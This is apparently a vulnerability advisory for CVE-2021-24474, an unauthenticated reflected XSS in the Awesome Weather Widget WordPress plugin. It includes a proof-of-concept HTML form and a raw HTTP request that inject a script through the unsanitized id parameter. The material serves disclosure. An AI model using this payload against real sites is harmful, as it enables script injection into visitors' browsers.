Awesome Weather Widget <= 3.0.2 – Reflected Cross-site Scripting (XSS) | CVE 2021-24474

Description

The plugin does not sanitize the id parameter of its awesome_weather_refresh AJAX action, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) Vulnerability.

Note (WPScanTeam): The issue was reported to the WP plugins team on May 4th, 2021, then June 7th, 2021 due to lack of update.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="awesome_weather_refresh" />
      <input type="hidden" name="owm_city_id" value="1" />
      <input type="hidden" name="id" value='aa"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close
Cookie: [unauthenticated/any authenticated]

action=awesome_weather_refresh&owm_city_id=1&id=aa"><script>alert(/XSS/)</script>